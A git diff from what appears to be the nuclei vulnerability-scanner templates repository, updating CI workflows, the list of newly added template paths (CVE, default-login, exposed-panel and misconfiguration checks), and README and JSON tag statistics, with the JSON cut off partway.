diff --git a/.github/workflows/template-checksum.yml b/.github/workflows/template-checksum.yml
index 6507091256..3bdf974ecf 100644
--- a/.github/workflows/template-checksum.yml
+++ b/.github/workflows/template-checksum.yml
@@ -24,7 +24,7 @@ jobs:
- name: install checksum generator
run: |
- go install -v github.com/projectdiscovery/nuclei/v3/cmd/generate-checksum@dev
+ go install -v github.com/projectdiscovery/nuclei/v3/cmd/generate-checksum@latest
- name: generate checksum
id: checksum
@@ -46,4 +46,4 @@ jobs:
git pull --rebase
git push origin ${{ github.ref }}
env:
- GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
\ No newline at end of file
+ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
diff --git a/.github/workflows/template-db-indexer.yml b/.github/workflows/template-db-indexer.yml
index ca7a1da2e9..92305f055d 100644
--- a/.github/workflows/template-db-indexer.yml
+++ b/.github/workflows/template-db-indexer.yml
@@ -28,4 +28,4 @@ jobs:
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
run: |
- generate-index -mode templates
+ generate-index -mode templates -eft
diff --git a/.github/workflows/template-sign.yml b/.github/workflows/template-sign.yml
index 3e2daae036..a2f9eabe29 100644
--- a/.github/workflows/template-sign.yml
+++ b/.github/workflows/template-sign.yml
@@ -23,7 +23,7 @@ jobs:
go-version: 1.21.x
- name: nuclei install
- run: go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@dev
+ run: go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
- name: Template Sign
id: sign
diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml
index ce39531cc1..0a94ae4d07 100644
--- a/.github/workflows/templates-sync.yml
+++ b/.github/workflows/templates-sync.yml
@@ -3,27 +3,78 @@ on:
push:
paths:
- '.new-additions'
- - 'code/cves/2024/CVE-2024-3094.yaml'
- - 'http/cves/2022/CVE-2022-0424.yaml'
- - 'http/cves/2024/CVE-2024-0337.yaml'
- - 'http/cves/2024/CVE-2024-2879.yaml'
- - 'http/cves/2024/CVE-2024-3273.yaml'
- - 'http/default-logins/allnet/allnet-default-login.yaml'
- - 'http/default-logins/asus/asus-rtn16-default-login.yaml'
- - 'http/default-logins/asus/asus-wl500g-default-login.yaml'
- - 'http/default-logins/asus/asus-wl520GU-default-login.yaml'
- - 'http/exposed-panels/beyondtrust-priv-panel.yaml'
- - 'http/exposed-panels/mitel-micollab-panel.yaml'
- - 'http/exposed-panels/mitric-checker-panel.yaml'
- - 'http/exposed-panels/outsystems-servicecenter-panel.yaml'
- - 'http/exposed-panels/zenml-dashboard-panel.yaml'
- - 'http/exposures/apis/aspnet-soap-webservices-asmx.yaml'
- - 'http/misconfiguration/dlink-unauth-cgi-script.yaml'
- - 'http/misconfiguration/helm-dashboard-exposure.yaml'
- - 'http/misconfiguration/intelbras-dvr-unauth.yaml'
- - 'http/misconfiguration/thanos-prometheus-exposure.yaml'
- - 'http/technologies/citrix-xenmobile-version.yaml'
- - 'http/technologies/splunkhec-detect.yaml'
+ - 'headless/webpack-sourcemap.yaml'
+ - 'http/cnvd/2024/CNVD-2024-15077.yaml'
+ - 'http/cves/2022/CVE-2022-0666.yaml'
+ - 'http/cves/2022/CVE-2022-1580.yaml'
+ - 'http/cves/2022/CVE-2022-34534.yaml'
+ - 'http/cves/2023/CVE-2023-2059.yaml'
+ - 'http/cves/2023/CVE-2023-3077.yaml'
+ - 'http/cves/2023/CVE-2023-48084.yaml'
+ - 'http/cves/2024/CVE-2024-1380.yaml'
+ - 'http/cves/2024/CVE-2024-21683.yaml'
+ - 'http/cves/2024/CVE-2024-24919.yaml'
+ - 'http/cves/2024/CVE-2024-27348.yaml'
+ - 'http/cves/2024/CVE-2024-34470.yaml'
+ - 'http/cves/2024/CVE-2024-3495.yaml'
+ - 'http/cves/2024/CVE-2024-3822.yaml'
+ - 'http/cves/2024/CVE-2024-4358.yaml'
+ - 'http/cves/2024/CVE-2024-5230.yaml'
+ - 'http/default-logins/ampjuke-default-login.yaml'
+ - 'http/default-logins/cambium-networks/cambium-networks-default-login.yaml'
+ - 'http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml'
+ - 'http/exposed-panels/busybox-repository-browser.yaml'
+ - 'http/exposed-panels/cisco-firepower-panel.yaml'
+ - 'http/exposed-panels/cox-business-panel.yaml'
+ - 'http/exposed-panels/digital-watchdog-panel.yaml'
+ - 'http/exposed-panels/fortinet/fortisiem-panel.yaml'
+ - 'http/exposed-panels/oracle-access-management.yaml'
+ - 'http/exposed-panels/oracle-peoplesoft-panel.yaml'
+ - 'http/exposed-panels/vrealize-hyperic-login-panel.yaml'
+ - 'http/exposures/tokens/wechat/wechat-secret-key.yaml'
+ - 'http/iot/netgear-boarddataww-rce.yaml'
+ - 'http/miscellaneous/directory-listing.yaml'
+ - 'http/misconfiguration/dont-panic-traceback.yaml'
+ - 'http/misconfiguration/installer/activecollab-installer.yaml'
+ - 'http/misconfiguration/installer/call-com-installer.yaml'
+ - 'http/misconfiguration/installer/cms-made-simple-installer.yaml'
+ - 'http/misconfiguration/installer/confluence-installer.yaml'
+ - 'http/misconfiguration/installer/cubebackup-setup-installer.yaml'
+ - 'http/misconfiguration/installer/easy-wi-installer.yaml'
+ - 'http/misconfiguration/installer/ejbca-enterprise-installer.yaml'
+ - 'http/misconfiguration/installer/flarum-installer.yaml'
+ - 'http/misconfiguration/installer/fleetcart-installer.yaml'
+ - 'http/misconfiguration/installer/glpi-installer.yaml'
+ - 'http/misconfiguration/installer/invicti-enterprise-installer.yaml'
+ - 'http/misconfiguration/installer/invoice-ninja-installer.yaml'
+ - 'http/misconfiguration/installer/jfa-go-installer.yaml'
+ - 'http/misconfiguration/installer/justfans-installer.yaml'
+ - 'http/misconfiguration/installer/librenms-installer.yaml'
+ - 'http/misconfiguration/installer/mura-cms-setup-installer.yaml'
+ - 'http/misconfiguration/installer/onlyoffice-installer.yaml'
+ - 'http/misconfiguration/installer/openemr-setup-installer.yaml'
+ - 'http/misconfiguration/installer/orchard-installer.yaml'
+ - 'http/misconfiguration/installer/pandora-fms-installer.yaml'
+ - 'http/misconfiguration/installer/profittrailer-installer.yaml'
+ - 'http/misconfiguration/installer/projectsend-installer.yaml'
+ - 'http/misconfiguration/installer/snipe-it-installer.yaml'
+ - 'http/misconfiguration/installer/stackposts-installer.yaml'
+ - 'http/misconfiguration/installer/tastyigniter-installer.yaml'
+ - 'http/misconfiguration/installer/ubersmith-installer.yaml'
+ - 'http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml'
+ - 'http/misconfiguration/installer/virtual-smartzone-installer.yaml'
+ - 'http/misconfiguration/installer/wowonder-installer.yaml'
+ - 'http/technologies/cowboy-detect.yaml'
+ - 'http/technologies/gabia-server-detect.yaml'
+ - 'http/technologies/gotweb-detect.yaml'
+ - 'http/technologies/sparklighter-detect.yaml'
+ - 'http/vulnerabilities/other/aquatronica-info-leak.yaml'
+ - 'http/vulnerabilities/other/array-vpn-lfi.yaml'
+ - 'http/vulnerabilities/other/cerio-dt-rce.yaml'
+ - 'http/vulnerabilities/other/easycvr-info-leak.yaml'
+ - 'javascript/backdoor/proftpd-backdoor.yaml'
+ - 'network/detection/bitvise-ssh-detect.yaml'
+ - 'passive/cves/2024/CVE-2024-25723.yaml'
workflow_dispatch:
jobs:
triggerRemoteWorkflow:
diff --git a/.github/workflows/wordpress-plugins-update.yml b/.github/workflows/wordpress-plugins-update.yml
index 649e928454..288e88ce43 100644
--- a/.github/workflows/wordpress-plugins-update.yml
+++ b/.github/workflows/wordpress-plugins-update.yml
@@ -1,7 +1,8 @@
name: ✨ WordPress Plugins - Update
on:
- workflow_dispatch:
+ schedule:
+ - cron: "0 0 * * *"
jobs:
Update:
diff --git a/.new-additions b/.new-additions
index 8b0186dd59..9d6d20d44f 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,21 +1,72 @@
-code/cves/2024/CVE-2024-3094.yaml
-http/cves/2022/CVE-2022-0424.yaml
-http/cves/2024/CVE-2024-0337.yaml
-http/cves/2024/CVE-2024-2879.yaml
-http/cves/2024/CVE-2024-3273.yaml
-http/default-logins/allnet/allnet-default-login.yaml
-http/default-logins/asus/asus-rtn16-default-login.yaml
-http/default-logins/asus/asus-wl500g-default-login.yaml
-http/default-logins/asus/asus-wl520GU-default-login.yaml
-http/exposed-panels/beyondtrust-priv-panel.yaml
-http/exposed-panels/mitel-micollab-panel.yaml
-http/exposed-panels/mitric-checker-panel.yaml
-http/exposed-panels/outsystems-servicecenter-panel.yaml
-http/exposed-panels/zenml-dashboard-panel.yaml
-http/exposures/apis/aspnet-soap-webservices-asmx.yaml
-http/misconfiguration/dlink-unauth-cgi-script.yaml
-http/misconfiguration/helm-dashboard-exposure.yaml
-http/misconfiguration/intelbras-dvr-unauth.yaml
-http/misconfiguration/thanos-prometheus-exposure.yaml
-http/technologies/citrix-xenmobile-version.yaml
-http/technologies/splunkhec-detect.yaml
+headless/webpack-sourcemap.yaml
+http/cnvd/2024/CNVD-2024-15077.yaml
+http/cves/2022/CVE-2022-0666.yaml
+http/cves/2022/CVE-2022-1580.yaml
+http/cves/2022/CVE-2022-34534.yaml
+http/cves/2023/CVE-2023-2059.yaml
+http/cves/2023/CVE-2023-3077.yaml
+http/cves/2023/CVE-2023-48084.yaml
+http/cves/2024/CVE-2024-1380.yaml
+http/cves/2024/CVE-2024-21683.yaml
+http/cves/2024/CVE-2024-24919.yaml
+http/cves/2024/CVE-2024-27348.yaml
+http/cves/2024/CVE-2024-34470.yaml
+http/cves/2024/CVE-2024-3495.yaml
+http/cves/2024/CVE-2024-3822.yaml
+http/cves/2024/CVE-2024-4358.yaml
+http/cves/2024/CVE-2024-5230.yaml
+http/default-logins/ampjuke-default-login.yaml
+http/default-logins/cambium-networks/cambium-networks-default-login.yaml
+http/default-logins/digital-watchdog/digital-watchdog-default-login.yaml
+http/exposed-panels/busybox-repository-browser.yaml
+http/exposed-panels/cisco-firepower-panel.yaml
+http/exposed-panels/cox-business-panel.yaml
+http/exposed-panels/digital-watchdog-panel.yaml
+http/exposed-panels/fortinet/fortisiem-panel.yaml
+http/exposed-panels/oracle-access-management.yaml
+http/exposed-panels/oracle-peoplesoft-panel.yaml
+http/exposed-panels/vrealize-hyperic-login-panel.yaml
+http/exposures/tokens/wechat/wechat-secret-key.yaml
+http/iot/netgear-boarddataww-rce.yaml
+http/miscellaneous/directory-listing.yaml
+http/misconfiguration/dont-panic-traceback.yaml
+http/misconfiguration/installer/activecollab-installer.yaml
+http/misconfiguration/installer/call-com-installer.yaml
+http/misconfiguration/installer/cms-made-simple-installer.yaml
+http/misconfiguration/installer/confluence-installer.yaml
+http/misconfiguration/installer/cubebackup-setup-installer.yaml
+http/misconfiguration/installer/easy-wi-installer.yaml
+http/misconfiguration/installer/ejbca-enterprise-installer.yaml
+http/misconfiguration/installer/flarum-installer.yaml
+http/misconfiguration/installer/fleetcart-installer.yaml
+http/misconfiguration/installer/glpi-installer.yaml
+http/misconfiguration/installer/invicti-enterprise-installer.yaml
+http/misconfiguration/installer/invoice-ninja-installer.yaml
+http/misconfiguration/installer/jfa-go-installer.yaml
+http/misconfiguration/installer/justfans-installer.yaml
+http/misconfiguration/installer/librenms-installer.yaml
+http/misconfiguration/installer/mura-cms-setup-installer.yaml
+http/misconfiguration/installer/onlyoffice-installer.yaml
+http/misconfiguration/installer/openemr-setup-installer.yaml
+http/misconfiguration/installer/orchard-installer.yaml
+http/misconfiguration/installer/pandora-fms-installer.yaml
+http/misconfiguration/installer/profittrailer-installer.yaml
+http/misconfiguration/installer/projectsend-installer.yaml
+http/misconfiguration/installer/snipe-it-installer.yaml
+http/misconfiguration/installer/stackposts-installer.yaml
+http/misconfiguration/installer/tastyigniter-installer.yaml
+http/misconfiguration/installer/ubersmith-installer.yaml
+http/misconfiguration/installer/uvdesk-helpdesk-installer.yaml
+http/misconfiguration/installer/virtual-smartzone-installer.yaml
+http/misconfiguration/installer/wowonder-installer.yaml
+http/technologies/cowboy-detect.yaml
+http/technologies/gabia-server-detect.yaml
+http/technologies/gotweb-detect.yaml
+http/technologies/sparklighter-detect.yaml
+http/vulnerabilities/other/aquatronica-info-leak.yaml
+http/vulnerabilities/other/array-vpn-lfi.yaml
+http/vulnerabilities/other/cerio-dt-rce.yaml
+http/vulnerabilities/other/easycvr-info-leak.yaml
+javascript/backdoor/proftpd-backdoor.yaml
+network/detection/bitvise-ssh-detect.yaml
+passive/cves/2024/CVE-2024-25723.yaml
diff --git a/README.md b/README.md
index 5bf7803aa2..cdd58890f5 100644
--- a/README.md
+++ b/README.md
@@ -40,20 +40,20 @@ An overview of the nuclei template project, including statistics on unique tags,
## Nuclei Templates Top 10 statistics
-| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
-|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
-| cve | 2425 | dhiyaneshdk | 1251 | http | 7306 | info | 3621 | file | 337 |
-| panel | 1108 | daffainfo | 864 | file | 337 | high | 1635 | dns | 24 |
-| wordpress | 959 | dwisiswant0 | 803 | workflows | 191 | medium | 1473 | | |
-| xss | 895 | pikpikcu | 353 | network | 136 | critical | 981 | | |
-| exposure | 894 | pussycat0x | 345 | code | 80 | low | 258 | | |
-| wp-plugin | 834 | ritikchaddha | 320 | javascript | 55 | unknown | 36 | | |
-| osint | 803 | pdteam | 296 | ssl | 28 | | | | |
-| tech | 670 | ricardomaia | 232 | dast | 21 | | | | |
-| lfi | 647 | geeknik | 229 | dns | 21 | | | | |
-| edb | 598 | theamanrawat | 223 | headless | 11 | | | | |
+| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
+|-----------|-------|---------------|-------|------------|-------|----------|-------|------|-------|
+| cve | 2490 | dhiyaneshdk | 1289 | http | 7477 | info | 3683 | file | 337 |
+| panel | 1145 | daffainfo | 864 | file | 337 | high | 1728 | dns | 25 |
+| wordpress | 976 | dwisiswant0 | 803 | workflows | 191 | medium | 1520 | | |
+| exposure | 916 | pussycat0x | 354 | network | 135 | critical | 1035 | | |
+| xss | 906 | pikpikcu | 353 | cloud | 98 | low | 263 | | |
+| wp-plugin | 847 | ritikchaddha | 346 | code | 81 | unknown | 39 | | |
+| osint | 804 | pdteam | 297 | javascript | 57 | | | | |
+| tech | 682 | princechaddha | 269 | ssl | 29 | | | | |
+| lfi | 658 | ricardomaia | 232 | dns | 22 | | | | |
+| misconfig | 620 | geeknik | 231 | dast | 21 | | | | |
-**621 directories, 8482 files**.
+**640 directories, 8753 files**.
diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json
index c9ba92ef97..b1b1c7734c 100644
--- a/TEMPLATES-STATS.json
+++ b/TEMPLATES-STATS.json
@@ -1 +1 @@
-{"tags":[{"name":"cve","count":2425},{"name":"panel","count":1108},{"name":"wordpress","count":959},{"name":"xss","count":895},{"name":"exposure","count":894},{"name":"wp-plugin","count":834},{"name":"osint","count":803},{"name":"tech","count":670},{"name":"lfi","count":647},{"name":"edb","count":598},{"name":"misconfig","count":596},{"name":"rce","count":584},{"name":"packetstorm","count":526},{"name":"cve2021","count":491},{"name":"wpscan","count":486},{"name":"cve2022","count":474},{"name":"wp","count":408},{"name":"unauth","count":359},{"name":"file","count":346},{"name":"cve2023","count":346},{"name":"authenticated","count":341},{"name":"sqli","count":339},{"name":"intrusive","count":295},{"name":"kev","count":270},{"name":"cve2020","count":257},{"name":"token-spray","count":243},{"name":"login","count":237},{"name":"detect","count":232},{"name":"config","count":218},{"name":"oast","count":218},{"name":"top-200","count":215},{"name":"osint-social","count":210},{"name":"default-login","count":204},{"name":"token","count":193},{"name":"","count":191},{"name":"network","count":190},{"name":"apache","count":188},{"name":"cve2018","count":169},{"name":"iot","count":166},{"name":"cve2019","count":164},{"name":"keys","count":155},{"name":"joomla","count":148},{"name":"malware","count":141},{"name":"redirect","count":133},{"name":"auth-bypass","count":125},{"name":"ssrf","count":118},{"name":"phishing","count":117},{"name":"cve2010","count":112},{"name":"files","count":112},{"name":"cve2017","count":110},{"name":"router","count":108},{"name":"cms","count":107},{"name":"install","count":105},{"name":"top-100","count":100},{"name":"disclosure","count":87},{"name":"devops","count":87},{"name":"linux","count":83},{"name":"code","count":80},{"name":"privesc","count":79},{"name":"local","count":79},{"name":"tokens","count":78},{"name":"seclists","count":77},{"name":"takeover","count":74},{"name":"fileupload","count":71},{"name":"oracle","count":70},{"name":"oss","count":67},{"name":"cisco","count":66},{"name":"adobe","count":62},{"name":"js","count":61},{"name":"ir","count":60},{"name":"huntr","count":59},{"name":"cve2015","count":58},{"name":"atlassian","count":57},{"name":"cve2016","count":57},{"name":"vmware","count":56},{"name":"google","count":56},{"name":"enum","count":55},{"name":"c2","count":54},{"name":"logs","count":48},{"name":"tenable","count":48},{"name":"log4j","count":47},{"name":"vulhub","count":46},{"name":"hackerone","count":46},{"name":"osint-gaming","count":45},{"name":"aem","count":45},{"name":"jndi","count":44},{"name":"aws","count":44},{"name":"cve2014","count":44},{"name":"debug","count":44},{"name":"php","count":43},{"name":"deserialization","count":43},{"name":"cloud","count":43},{"name":"osint-hobby","count":42},{"name":"plugin","count":42},{"name":"generic","count":42},{"name":"osint-porn","count":42},{"name":"traversal","count":42},{"name":"oa","count":42},{"name":"springboot","count":41},{"name":"microsoft","count":39},{"name":"cnvd","count":39},{"name":"misc","count":39},{"name":"injection","count":38},{"name":"kubernetes","count":37},{"name":"jira","count":37},{"name":"listing","count":37},{"name":"ibm","count":36},{"name":"cve2024","count":36},{"name":"cti","count":36},{"name":"osint-misc","count":35},{"name":"sap","count":34},{"name":"fuzz","count":33},{"name":"miscellaneous","count":32},{"name":"osint-tech","count":31},{"name":"osint-coding","count":30},{"name":"ssl","count":29},{"name":"wp-theme","count":28},{"name":"k8s","count":28},{"name":"tls","count":28},{"name":"amazon","count":28},{"name":"gitlab","count":28},{"name":"api","count":27},{"name":"bestwebsoft","count":27},{"name":"fortinet","count":27},{"name":"dlink","count":27},{"name":"cve2012","count":26},{"name":"ssh","count":26},{"name":"firewall","count":25},{"name":"zohocorp","count":25},{"name":"proxy","count":25},{"name":"citrix","count":25},{"name":"weaver","count":25},{"name":"manageengine","count":25},{"name":"zoho","count":24},{"name":"osint-finance","count":24},{"name":"admin","count":24},{"name":"osint-business","count":24},{"name":"lfr","count":24},{"name":"osint-images","count":24},{"name":"osint-shopping","count":24},{"name":"stored-xss","count":23},{"name":"tomcat","count":23},{"name":"dns","count":23},{"name":"yonyou","count":23},{"name":"audit","count":23},{"name":"xxe","count":23},{"name":"file-upload","count":23},{"name":"cicd","count":22},{"name":"weblogic","count":21},{"name":"printer","count":21},{"name":"github","count":21},{"name":"ecology","count":21},{"name":"dast","count":21},{"name":"msf","count":21},{"name":"camera","count":20},{"name":"jenkins","count":20},{"name":"rukovoditel","count":19},{"name":"ftp","count":19},{"name":"grafana","count":19},{"name":"struts","count":19},{"name":"hp","count":19},{"name":"wavlink","count":19},{"name":"android","count":18},{"name":"prestashop","count":18},{"name":"coldfusion","count":18},{"name":"ruijie","count":18},{"name":"osint-music","count":18},{"name":"cve2011","count":18},{"name":"node.js","count":17},{"name":"azure","count":17},{"name":"service","count":17},{"name":"nginx","count":17},{"name":"confluence","count":17},{"name":"rconfig","count":16},{"name":"jarm","count":16},{"name":"cve2009","count":16},{"name":"status","count":16},{"name":"microweber","count":16},{"name":"backup","count":16},{"name":"alibaba","count":16},{"name":"osint-blog","count":16},{"name":"honeypot","count":16},{"name":"mail","count":16},{"name":"nodejs","count":15},{"name":"woocommerce","count":15},{"name":"zyxel","count":15},{"name":"cnvd2021","count":15},{"name":"tongda","count":15},{"name":"cve2013","count":15},{"name":"cve2008","count":15},{"name":"java","count":15},{"name":"seeyon","count":15},{"name":"vpn","count":15},{"name":"ruby","count":15},{"name":"bypass","count":15},{"name":"magento","count":15},{"name":"auth","count":14},{"name":"login-check","count":14},{"name":"dell","count":14},{"name":"creds-stuffing","count":14},{"name":"node","count":14},{"name":"docker","count":14},{"name":"backdoor","count":14},{"name":"osint-health","count":14},{"name":"headless","count":14},{"name":"domainmod","count":14},{"name":"icewarp","count":14},{"name":"windows","count":14},{"name":"redhat","count":14},{"name":"redis","count":14},{"name":"nagios","count":14},{"name":"npm","count":14},{"name":"smtp","count":14},{"name":"smb","count":14},{"name":"osint-art","count":14},{"name":"jboss","count":14},{"name":"dashboard","count":14},{"name":"postgresql","count":13},{"name":"airflow","count":13},{"name":"rails","count":13},{"name":"laravel","count":13},{"name":"graphql","count":13},{"name":"sonicwall","count":13},{"name":"osint-political","count":13},{"name":"setup","count":13},{"name":"mysql","count":13},{"name":"git","count":13},{"name":"fortigate","count":13},{"name":"ssti","count":13},{"name":"ivanti","count":13},{"name":"abstractapi","count":13},{"name":"cuppa","count":13},{"name":"hashicorp","count":13},{"name":"cuppacms","count":13},{"name":"osint-dating","count":13},{"name":"netgear","count":13},{"name":"webserver","count":12},{"name":"kafka","count":12},{"name":"netsweeper","count":12},{"name":"ofbiz","count":12},{"name":"doppler","count":12},{"name":"moosocial","count":12},{"name":"newrelic","count":12},{"name":"drupal","count":12},{"name":"zimbra","count":12},{"name":"jetbrains","count":11},{"name":"online_fire_reporting_system_project","count":11},{"name":"online-fire-reporting","count":11},{"name":"phpgurukul","count":11},{"name":"vbulletin","count":11},{"name":"jolokia","count":11},{"name":"osint-video","count":11},{"name":"fastjson","count":11},{"name":"iis","count":11},{"name":"phpmyadmin","count":11},{"name":"django","count":11},{"name":"spring","count":11},{"name":"xstream","count":11},{"name":"sitecore","count":10},{"name":"solarview","count":10},{"name":"prometheus","count":10},{"name":"hikvision","count":10},{"name":"installer","count":10},{"name":"solr","count":10},{"name":"cache","count":10},{"name":"dropbox","count":10},{"name":"zabbix","count":10},{"name":"glpi","count":10},{"name":"thinkphp","count":10},{"name":"info-leak","count":10},{"name":"samsung","count":10},{"name":"symfony","count":10},{"name":"db","count":10},{"name":"elasticsearch","count":10},{"name":"dedecms","count":10},{"name":"xstream_project","count":10},{"name":"digitalocean","count":10},{"name":"versa","count":9},{"name":"sangfor","count":9},{"name":"sophos","count":9},{"name":"pfsense","count":9},{"name":"artica","count":9},{"name":"secret","count":9},{"name":"vcenter","count":9},{"name":"exchange","count":9},{"name":"scada","count":9},{"name":"moodle","count":9},{"name":"kube","count":9},{"name":"druid","count":9},{"name":"firebase","count":9},{"name":"elastic","count":9},{"name":"facebook","count":9},{"name":"python","count":9},{"name":"opencats","count":9},{"name":"cnvd2020","count":9},{"name":"gitea","count":9},{"name":"dahua","count":9},{"name":"blind","count":9},{"name":"lucee","count":9},{"name":"instrusive","count":9},{"name":"bitbucket","count":9},{"name":"wso2","count":9},{"name":"crlf","count":9},{"name":"symantec","count":8},{"name":"go","count":8},{"name":"hms","count":8},{"name":"spotweb","count":8},{"name":"metadata","count":8},{"name":"error","count":8},{"name":"huawei","count":8},{"name":"atom","count":8},{"name":"phpjabbers","count":8},{"name":"phpinfo","count":8},{"name":"config-audit","count":8},{"name":"cloud-enum","count":8},{"name":"mirai","count":8},{"name":"bucket","count":8},{"name":"manager","count":8},{"name":"recon","count":8},{"name":"console","count":8},{"name":"spotweb_project","count":8},{"name":"e-office","count":8},{"name":"osint-news","count":8},{"name":"ognl","count":8},{"name":"oauth","count":8},{"name":"default-page","count":8},{"name":"unauthenticated","count":8},{"name":"discord","count":8},{"name":"wanhu","count":8},{"name":"progress","count":8},{"name":"cisco-switch","count":8},{"name":"mlflow","count":8},{"name":"emerge","count":8},{"name":"odoo","count":8},{"name":"telesquare","count":7},{"name":"opensis","count":7},{"name":"blockchain","count":7},{"name":"nagiosxi","count":7},{"name":"activemq","count":7},{"name":"nortekcontrol","count":7},{"name":"car_rental_management_system_project","count":7},{"name":"nacos","count":7},{"name":"joomla\\!","count":7},{"name":"bigip","count":7},{"name":"database","count":7},{"name":"websphere","count":7},{"name":"fortios","count":7},{"name":"monstra","count":7},{"name":"filemanager","count":7},{"name":"exploitdb","count":7},{"name":"shopify","count":7},{"name":"oos","count":7},{"name":"ruckus","count":7},{"name":"f5","count":7},{"name":"vms","count":7},{"name":"nexus","count":7},{"name":"twitter","count":7},{"name":"squirrelmail","count":7},{"name":"solarwinds","count":7},{"name":"landray","count":7},{"name":"rfi","count":7},{"name":"mobileiron","count":7},{"name":"avtech","count":7},{"name":"keking","count":7},{"name":"pmb","count":7},{"name":"contec","count":7},{"name":"linkedin","count":7},{"name":"gogs","count":7},{"name":"cacti","count":7},{"name":"bloofox","count":7},{"name":"ec2","count":7},{"name":"maps","count":7},{"name":"moodating","count":7},{"name":"slack","count":7},{"name":"fpd","count":7},{"name":"minio","count":6},{"name":"sql","count":6},{"name":"paypal","count":6},{"name":"magmi","count":6},{"name":"tikiwiki","count":6},{"name":"geoserver","count":6},{"name":"asp","count":6},{"name":"express","count":6},{"name":"kubelet","count":6},{"name":"jamf","count":6},{"name":"jeecg","count":6},{"name":"elfinder","count":6},{"name":"mongodb","count":6},{"name":"leak","count":6},{"name":"vrealize","count":6},{"name":"doctor_appointment_system_project","count":6},{"name":"74cms","count":6},{"name":"keycloak","count":6},{"name":"cobbler","count":6},{"name":"rat","count":6},{"name":"teamcity","count":6},{"name":"s3","count":6},{"name":"microstrategy","count":6},{"name":"sonarqube","count":6},{"name":"doctor-appointment-system","count":6},{"name":"advantech","count":6},{"name":"chanjet","count":6},{"name":"zhiyuan","count":6},{"name":"webmin","count":6},{"name":"servicenow","count":6},{"name":"microfocus","count":6},{"name":"couchdb","count":6},{"name":"liferay","count":6},{"name":"flutterwave","count":6},{"name":"cockpit","count":6},{"name":"typo3","count":6},{"name":"gcp","count":6},{"name":"plesk","count":6},{"name":"log","count":6},{"name":"openvpn","count":6},{"name":"synacor","count":6},{"name":"jetty","count":6},{"name":"lfprojects","count":6},{"name":"metinfo","count":5},{"name":"percha","count":5},{"name":"elementor","count":5},{"name":"nuuo","count":5},{"name":"genetechsolutions","count":5},{"name":"jabber","count":5},{"name":"avideo","count":5},{"name":"hpe","count":5},{"name":"schneider-electric","count":5},{"name":"avaya","count":5},{"name":"glpi-project","count":5},{"name":"akamai","count":5},{"name":"hybris","count":5},{"name":"thedigitalcraft","count":5},{"name":"circontrol","count":5},{"name":"connectwise","count":5},{"name":"caucho","count":5},{"name":"ems","count":5},{"name":"totolink","count":5},{"name":"parallels","count":5},{"name":"10web","count":5},{"name":"ethereum","count":5},{"name":"sentry","count":5},{"name":"cnvd2023","count":5},{"name":"server","count":5},{"name":"ldap","count":5},{"name":"cve2007","count":5},{"name":"openai","count":5},{"name":"qnap","count":5},{"name":"craftcms","count":5},{"name":"carrental","count":5},{"name":"magmi_project","count":5},{"name":"redmine","count":5},{"name":"web3","count":5},{"name":"pyload","count":5},{"name":"bmc","count":5},{"name":"gocd","count":5},{"name":"mikrotik","count":5},{"name":"strapi","count":5},{"name":"sysaid","count":5},{"name":"swagger","count":5},{"name":"rseenet","count":5},{"name":"dionaea","count":5},{"name":"fatpipe","count":5},{"name":"xmlrpc","count":5},{"name":"awstats","count":5},{"name":"graylog","count":5},{"name":"vehicle_service_management_system_project","count":5},{"name":"mssql","count":5},{"name":"storage","count":5},{"name":"terramaster","count":5},{"name":"zzzcms","count":5},{"name":"circarlife","count":5},{"name":"wbce","count":5},{"name":"openemr","count":5},{"name":"cloudflare","count":5},{"name":"resin","count":5},{"name":"sftp","count":5},{"name":"paloaltonetworks","count":5},{"name":"decision-center","count":5},{"name":"beyondtrust","count":5},{"name":"kkfileview","count":5},{"name":"voip","count":5},{"name":"asana","count":5},{"name":"react","count":5},{"name":"jwt","count":5},{"name":"chamilo","count":5},{"name":"tenda","count":5},{"name":"apisix","count":5},{"name":"splunk","count":5},{"name":"papercut","count":5},{"name":"matrix","count":5},{"name":"square","count":5},{"name":"openstack","count":5},{"name":"adminer","count":5},{"name":"agentejo","count":5},{"name":"goanywhere","count":5},{"name":"webview","count":5},{"name":"axigen","count":5},{"name":"jupyter","count":5},{"name":"gateway","count":5},{"name":"firmware","count":5},{"name":"adb","count":5},{"name":"horde","count":4},{"name":"zte","count":4},{"name":"grav","count":4},{"name":"hongdian","count":4},{"name":"veronalabs","count":4},{"name":"dotnet","count":4},{"name":"env","count":4},{"name":"d-link","count":4},{"name":"dahuasecurity","count":4},{"name":"joomlamo","count":4},{"name":"photo","count":4},{"name":"kibana","count":4},{"name":"umbraco","count":4},{"name":"datadog","count":4},{"name":"terra-master","count":4},{"name":"sugarcrm","count":4},{"name":"aria","count":4},{"name":"djangoproject","count":4},{"name":"puppet","count":4},{"name":"jellyfin","count":4},{"name":"bittrex","count":4},{"name":"artifactory","count":4},{"name":"ternaria","count":4},{"name":"springcloud","count":4},{"name":"rubyonrails","count":4},{"name":"powerjob","count":4},{"name":"http","count":4},{"name":"sendgrid","count":4},{"name":"angular","count":4},{"name":"moveit","count":4},{"name":"mostra","count":4},{"name":"pega","count":4},{"name":"mailchimp","count":4},{"name":"webkul","count":4},{"name":"prtg","count":4},{"name":"heroku","count":4},{"name":"juniper","count":4},{"name":"yeswiki","count":4},{"name":"digitaldruid","count":4},{"name":"password","count":4},{"name":"candidats","count":4},{"name":"newstatpress","count":4},{"name":"casaos","count":4},{"name":"harbor","count":4},{"name":"linkerd","count":4},{"name":"newstatpress_project","count":4},{"name":"gnuboard","count":4},{"name":"dolibarr","count":4},{"name":"confluent","count":4},{"name":"harmistechnology","count":4},{"name":"aspose","count":4},{"name":"cnvd2022","count":4},{"name":"jorani","count":4},{"name":"tiki","count":4},{"name":"hongfan","count":4